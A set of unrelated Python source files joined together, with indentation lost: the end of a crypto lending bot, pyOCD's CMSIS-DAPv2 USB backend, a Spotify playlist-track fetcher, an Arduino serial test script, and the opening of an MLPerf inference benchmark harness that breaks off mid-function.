log.log('Using custom mindailyrate ' + str(coin_cfg[cur]['minrate'] * 100) + '% for ' + cur)
if Analysis:
recommended_min = Analysis.get_rate_suggestion(cur)
if cur_min_daily_rate < recommended_min:
cur_min_daily_rate = recommended_min
return Decimal(cur_min_daily_rate)
def construct_order_book(active_cur):
# make sure we have a request limit for this currency
if active_cur not in loanOrdersRequestLimit:
loanOrdersRequestLimit[active_cur] = defaultLoanOrdersRequestLimit
loans = api.return_loan_orders(active_cur, loanOrdersRequestLimit[active_cur])
if len(loans) == 0:
return False
rate_book = []
volume_book = []
for offer in loans['offers']:
rate_book.append(offer['rate'])
volume_book.append(offer['amount'])
return {'rates': rate_book, 'volumes': volume_book}
def get_gap_rate(active_cur, gap_pct, order_book, cur_total_balance):
gap_expected = gap_pct * cur_total_balance / 100
gap_sum = 0
i = -1
while gap_sum < gap_expected:
i += 1
if i == len(order_book['volumes']) and len(order_book['volumes']) == loanOrdersRequestLimit[active_cur]:
loanOrdersRequestLimit[active_cur] += defaultLoanOrdersRequestLimit
log.log(active_cur + ': Not enough offers in response, adjusting request limit to ' + str(
loanOrdersRequestLimit[active_cur]))
raise StopIteration
elif i == len(order_book['volumes']):
return max_daily_rate
gap_sum += float(order_book['volumes'][i])
return Decimal(order_book['rates'][i])
def get_cur_spread(spread, cur_active_bal, active_cur):
cur_spread_lend = int(spread) # Checks if active_bal can't be spread that many times, and may go down to 1.
cur_min_loan_size = get_min_loan_size(active_cur)
while cur_active_bal < (cur_spread_lend * cur_min_loan_size):
cur_spread_lend -= 1
return int(cur_spread_lend)
def construct_orders(cur, cur_active_bal, cur_total_balance):
cur_spread = get_cur_spread(spread_lend, cur_active_bal, cur)
order_book = construct_order_book(cur)
bottom_rate = get_gap_rate(cur, gap_bottom, order_book, cur_total_balance)
top_rate = get_gap_rate(cur, gap_top, order_book, cur_total_balance)
gap_diff = top_rate - bottom_rate
if cur_spread == 1:
rate_step = 0
else:
rate_step = gap_diff / (cur_spread - 1)
order_rates = []
i = 0
while i < cur_spread:
new_rate = bottom_rate + (rate_step * i)
order_rates.append(new_rate)
i += 1
# Condensing and logic'ing time
for rate in order_rates:
if rate > max_daily_rate:
order_rates.remove(rate)
order_rates.append(max_daily_rate)
new_order_rates = sorted(list(set(order_rates)))
new_order_amounts = []
i = 0
while i < len(new_order_rates):
new_amount = Data.truncate(cur_active_bal / len(new_order_rates), 8)
new_order_amounts.append(Decimal(new_amount))
i += 1
remainder = cur_active_bal - sum(new_order_amounts)
if remainder > 0: # If truncating causes remainder, add that to first order.
new_order_amounts[0] += remainder
return {'amounts': new_order_amounts, 'rates': new_order_rates}
def lend_cur(active_cur, total_lended, lending_balances):
active_cur_total_balance = Decimal(lending_balances[active_cur])
if active_cur in total_lended:
active_cur_total_balance += Decimal(total_lended[active_cur])
# min daily rate can be changed per currency
cur_min_daily_rate = get_min_daily_rate(active_cur)
# log total coin
log.updateStatusValue(active_cur, "totalCoins", (Decimal(active_cur_total_balance)))
order_book = construct_order_book(active_cur)
if not order_book or len(order_book['rates']) == 0 or not cur_min_daily_rate:
return 0
active_bal = MaxToLend.amount_to_lend(active_cur_total_balance, active_cur, Decimal(lending_balances[active_cur]),
Decimal(order_book['rates'][0]))
if float(active_bal) > get_min_loan_size(active_cur): # Make sure sleeptimer is set to active if any cur can lend.
currency_usable = 1
else:
return 0 # Return early to end function.
orders = construct_orders(active_cur, active_bal, active_cur_total_balance) # Construct all the potential orders
i = 0
while i < len(orders['amounts']): # Iterate through prepped orders and create them if they work
below_min = Decimal(orders['rates'][i]) < Decimal(cur_min_daily_rate)
if hide_coins and below_min:
log.log("Not lending {:s} due to rate below {:.4f}%".format(active_cur,(cur_min_daily_rate * 100)))
return 0
elif below_min:
rate = str(cur_min_daily_rate)
else:
rate = orders['rates'][i]
try:
create_lend_offer(active_cur, orders['amounts'][i], rate)
except Exception as msg:
if "Amount must be at least " in str(msg):
import re
results = re.findall('[-+]?([0-9]*\.[0-9]+|[0-9]+)', str(msg))
for result in results:
if result:
min_loan_sizes[active_cur] = float(result)
log.log(active_cur + "'s min_loan_size has been increased to the detected min: " + result)
return lend_cur(active_cur, total_lended, lending_balances) # Redo cur with new min.
else:
raise msg
i += 1 # Finally, move to next order.
return currency_usable
def transfer_balances():
# Transfers all balances on the included list to Lending.
if len(transferable_currencies) > 0:
exchange_balances = api.return_balances() # This grabs only exchange balances.
for coin in transferable_currencies:
if coin in exchange_balances and Decimal(
exchange_balances[coin]) > 0:
msg = api.transfer_balance(coin, exchange_balances[coin], 'exchange', 'lending')
log.log(log.digestApiMsg(msg))
log.notify(log.digestApiMsg(msg), notify_conf)
if coin not in exchange_balances:
print "ERROR: Incorrect coin entered for transferCurrencies: " + coin
|
pyusb_v2_backend.py | # pyOCD debugger
# Copyright (c) 2019-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import six
from time import sleep
import errno
import platform
from .interface import Interface
from .common import (
USB_CLASS_VENDOR_SPECIFIC,
filter_device_by_class,
is_known_cmsis_dap_vid_pid,
check_ep,
)
from ..dap_access_api import DAPAccessIntf
from ... import common
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSBv2(Interface):
"""!
@brief CMSIS-DAPv2 interface using pyUSB.
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSBv2, self).__init__()
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rx_stop_event = None
self.swo_thread = None
self.swo_stop_event = None
self.rcv_data = []
self.swo_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 512
self.is_swo_running = False
@property
def has_swo_ep(self):
return self.ep_swo is not None
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=HasCmsisDapv2Interface(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get CMSIS-DAPv2 interface
interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_v2_interface)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv2 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints. CMSIS-DAPv2 endpoints are in a fixed order.
try:
ep_out = interface.endpoints()[0]
ep_in = interface.endpoints()[1]
ep_swo = interface.endpoints()[2] if len(interface.endpoints()) > 2 else None
except IndexError:
raise DAPAccessIntf.DeviceError("CMSIS-DAPv2 device %s is missing endpoints" %
self.serial_number)
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.ep_swo = ep_swo
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.rx_stop_event = threading.Event()
thread_name = "CMSIS-DAP receive (%s)" % self.serial_number
self.thread = threading.Thread(target=self.rx_task, name=thread_name)
self.thread.daemon = True
self.thread.start()
def start_swo(self):
self.swo_stop_event = threading.Event()
thread_name = "SWO receive (%s)" % self.serial_number
self.swo_thread = threading.Thread(target=self.swo_rx_task, name=thread_name)
self.swo_thread.daemon = True
self.swo_thread.start()
self.is_swo_running = True
def stop_swo(self):
self.swo_stop_event.set()
self.swo_thread.join()
self.swo_thread = None
self.swo_stop_event = None
self.is_swo_running = False
def rx_task(self):
try:
while not self.rx_stop_event.is_set():
self.read_sem.acquire()
if not self.rx_stop_event.is_set():
self.rcv_data.append(self.ep_in.read(self.packet_size, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
def swo_rx_task(self):
try:
while not self.swo_stop_event.is_set():
try:
self.swo_data.append(self.ep_swo.read(self.ep_swo.wMaxPacketSize, 10 * 1000))
except usb.core.USBError:
pass
finally:
# Set last element of swo_data to None on exit
self.swo_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected devices with a CMSIS-DAPv2 interface."""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=HasCmsisDapv2Interface())
except usb.core.NoBackendError:
common.show_no_libusb_warning()
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSBv2()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint."""
if self.ep_out:
if (len(data) > 0) and (len(data) < self.packet_size) and (len(data) % self.ep_out.wMaxPacketSize == 0):
data.append(0)
self.read_sem.release()
self.ep_out.write(data)
#logging.debug('sent: %s', data)
def read(self):
"""! @brief Read data on the IN endpoint."""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited unexpectedly" % self.serial_number)
return self.rcv_data.pop(0)
def read_swo(self):
# Accumulate all available SWO data.
data = bytearray()
while len(self.swo_data):
if self.swo_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s SWO thread exited unexpectedly" % self.serial_number)
data += self.swo_data.pop(0)
return data
def close(self):
"""! @brief Close the USB interface."""
assert self.closed is False
if self.is_swo_running:
self.stop_swo()
self.closed = True
self.rx_stop_event.set()
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
self.swo_data = []
usb.util.release_interface(self.dev, self.intf_number)
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.thread = None
def _match_cmsis_dap_v2_interface(interface):
"""! @brief Returns true for a CMSIS-DAP v2 interface.
This match function performs several tests on the provided USB interface descriptor, to
determine whether it is a CMSIS-DAPv2 interface. These requirements must be met by the
interface:
1. Have an interface name string containing "CMSIS-DAP".
2. bInterfaceClass must be 0xff.
3. bInterfaceSubClass must be 0.
4. Must have bulk out and bulk in endpoints, with an optional extra bulk in endpoint, in
that order.
"""
try:
interface_name = usb.util.get_string(interface.device, interface.iInterface)
# This tells us whether the interface is CMSIS-DAP, but not whether it's v1 or v2.
if (interface_name is None) or ("CMSIS-DAP" not in interface_name):
return False
# Now check the interface class to distinguish v1 from v2.
if (interface.bInterfaceClass != USB_CLASS_VENDOR_SPECIFIC) \
or (interface.bInterfaceSubClass != 0):
return False
# Must have either 2 or 3 endpoints.
if interface.bNumEndpoints not in (2, 3):
return False
# Endpoint 0 must be bulk out.
if not check_ep(interface, 0, usb.util.ENDPOINT_OUT, usb.util.ENDPOINT_TYPE_BULK):
return False
# Endpoint 1 must be bulk in.
if not check_ep(interface, 1, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
return False
# Endpoint 2 is optional. If present it must be bulk in.
if (interface.bNumEndpoints == 3) \
and not check_ep(interface, 2, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
return False
# All checks passed, this is a CMSIS-DAPv2 interface!
return True
except (UnicodeDecodeError, IndexError):
# UnicodeDecodeError exception can be raised if the device has a corrupted interface name.
# Certain versions of STLinkV2 are known to have this problem. If we can't read the
# interface name, there's no way to tell if it's a CMSIS-DAPv2 interface.
#
# IndexError can be raised if an endpoint is missing.
return False
class HasCmsisDapv2Interface(object):
"""! @brief CMSIS-DAPv2 match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a CMSIS-DAPv2 device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
config = dev.get_active_configuration()
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_v2_interface)
except usb.core.USBError as error:
# Produce a more helpful error message if we get a permissions error on Linux.
if error.errno == errno.EACCES and platform.system() == "Linux" \
and common.should_show_libusb_device_error((dev.idVendor, dev.idProduct)):
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
return False
except (IndexError, NotImplementedError, ValueError, UnicodeDecodeError) as error:
return False
if cmsis_dap_interface is None:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
get_tracks.py | #!/usr/bin/env python
import multiprocessing
import sys
import spotipy
from spotipy import util
from spotipy.client import SpotifyException
import pickle
import os
import time
from spotify_tokens import * # stick your CLIENT_ID and CLIENT_SECRET here
# PLAYLIST_PATH = 'playlists.pickle'
TRACKS_PATH = 'tracks.pickle'
paused = False
def track_yielder(session, owner_id, playlist_id):
try:
res = session.user_playlist_tracks(owner_id, playlist_id,
fields='items(track(id, name, artists(name, id), duration_ms)),next')
while res:
for track in res['items']:
yield track['track']
tries = 3
while tries > 0:
try:
res = session.next(res)
if not res or not res.get('items'):
raise StopIteration
for track in res['items']:
yield track['track']
tries = 0
except SpotifyException as e:
if 400 <= e.http_status <= 499:
raise StopIteration
tries -= 1
time.sleep(1)
if tries == 0:
raise e
except SpotifyException as e:
if 400 <= e.http_status <= 499:
raise StopIteration
raise e
def fetch_playlists(session, control_queue, result_queue):
while not control_queue.empty():
while paused:
time.sleep(0.1)
playlist = control_queue.get()
tracks = list(track_yielder(session, playlist['owner'], playlist['id']))
result_queue.put((playlist['id'], tracks))
def main():
global paused
d = pickle.load(open(PLAYLIST_PATH, 'rb'))
playlists = list(d['playlists'].values())
print('Loaded %d playlists' % len(playlists))
del d
track_count = 0
if os.path.isfile(TRACKS_PATH):
tracks, track_ids_in_playlists = pickle.load(open(TRACKS_PATH, 'rb'))
track_count = sum(track['count'] for track in tracks.values())
print('Loaded %d playlists with %d tracks (%d unique)' % (len(track_ids_in_playlists), track_count, len(tracks)))
else:
tracks = {}
track_ids_in_playlists = {}
while True:
print('Getting Auth')
token = util.prompt_for_user_token('DOsinga', '',
client_id=CLIENT_ID, client_secret=CLIENT_SECRET,
redirect_uri='http://127.0.0.1:8000/callback')
session = spotipy.Spotify(auth=token)
control_queue = multiprocessing.Queue()
result_queue = multiprocessing.Queue()
for playlist in playlists:
if not playlist['id'] in track_ids_in_playlists:
control_queue.put(playlist)
if control_queue.empty():
break
processes = []
for task_idx in range(3):
p = multiprocessing.Process(target=fetch_playlists, args=(session, control_queue, result_queue))
p.start()
processes.append(p)
fetched = 0
missed_count = 0
start = time.time()
while any(p.is_alive() for p in processes):
while not result_queue.empty():
playlist_id, tracks_in_playlist = result_queue.get()
tracks_in_playlist = [t for t in tracks_in_playlist if t]
if tracks_in_playlist:
track_count += len(tracks_in_playlist)
for track in tracks_in_playlist:
track = tracks.setdefault(track['id'], track)
track['count'] = track.get('count', 0) + 1
track_ids_in_playlists[playlist_id] = [track['id'] for track in tracks_in_playlist]
fetched += 1
missed_count = 0
else:
missed_count += 1
if missed_count == 20:
paused = True
print('pausing for 30m after %d misses, then exiting' % missed_count)
for p in processes:
p.terminate()
time.sleep(1800)
sys.exit()
if len(track_ids_in_playlists) % 100 == 0:
print('playlists: %d (%2.1f%%) - qps: %2.1f - tracks: %d' % (len(track_ids_in_playlists), len(track_ids_in_playlists) * 100 / len(playlists), fetched / (time.time() - start), track_count))
if os.path.isfile(TRACKS_PATH):
os.rename(TRACKS_PATH, TRACKS_PATH + '.tmp')
with open(TRACKS_PATH, 'wb') as fout:
pickle.dump((tracks, track_ids_in_playlists), fout, -1)
if os.path.isfile(TRACKS_PATH + '.tmp'):
os.remove(TRACKS_PATH + '.tmp')
if len(track_ids_in_playlists) % 5000 == 0:
paused = True
print('Taking a break to quiet things down (20m)')
time.sleep(1200)
print('Break is done.')
paused = False
time.sleep(0.1)
with open(TRACKS_PATH, 'wb') as fout:
pickle.dump((tracks, track_ids_in_playlists), fout, -1)
if __name__ == '__main__':
main()
|
serial_test.py | #!/usr/bin/env python3
'''
MIT License
Copyright (c) 2017 - Ajay Guleria
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import serial, re
from threading import Thread
from time import sleep
import argparse, logging
import arduino_mode
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--device', default='/dev/serial0', help="Device to use for serial connection")
parser.add_argument('-l', '--logfile', default=None, help="Log file to use")
args = parser.parse_args()
try:
ser = serial.Serial(args.device, 115200)
sleep(1)
ser.flushInput()
#print(ser.name, "opened")
except:
print("Failed to open serial port", args.device)
quit()
if args.logfile is not None:
logging.basicConfig(filename=args.logfile, level=logging.DEBUG)
#logging.basicConfig(filename=args.logfile, level=logging.DEBUG, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logging.Formatter(fmt='%(asctime)s.%(msecs)03d %(message)s', datefmt='%H:%M:%S')
inputAvailable = False
entry = ""
bCont = True
def run_test():
arduino_mode.set_mode(3)
for s in [0, 1000, 1600, 1200, 1700, 1300, 1800, 1400, 1900, 0]:
sstr = 's=' + str(s) + '\n'
for t in [0, 1200, 0, 1200, 1600, 0, 1700, 1800, 1300, 0, 1300, 0]:
tstr = 't=' + str(t) + '\n'
ser.write(sstr.encode())
ser.write(tstr.encode())
#Arduino should continue to send out these pulses
sleep(1)
def output_function():
global bCont
while bCont:
try:
read_serial=ser.readline()
if len(read_serial):
if args.logfile is not None:
logging.info(read_serial)
else:
print(read_serial)
#sleep(.02)
except serial.SerialException:
print("Exception happened")
pass
except KeyboardInterrupt:
bCont = False
thread = Thread(target = output_function)
thread.start()
pat = re.compile('^\s*m\s*=\s*(\d+)\s*$', re.IGNORECASE)
arduino_mode.start_motors()
while bCont:
try:
entry = input("Print value to send: ");
if len(entry):
val = pat.match(entry)
if entry == 'test':
run_test()
elif val is not None:
arduino_mode.set_mode(int(val.group(1)))
else:
ser.write(entry.encode())
entry = ""
except KeyboardInterrupt:
bCont = False
#arduino_mode.set_mode(3)
ser.write('t=0'.encode())
ser.write('s=0'.encode())
arduino_mode.set_mode(0)
arduino_mode.stop_motors()
thread.join()
ser.close()
print('Done')
|
main_vision_test04b_war.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", default=8, type=int, help="mlperf multi-stream samples per query")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
##results = self.model.predict({self.model.inputs[0]: qitem.img})
##processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
for i in range(len(qitem.query_id)):
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results.extend(self.post_process(results, qitem.content_id, qitem.label, self.result_dict))
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
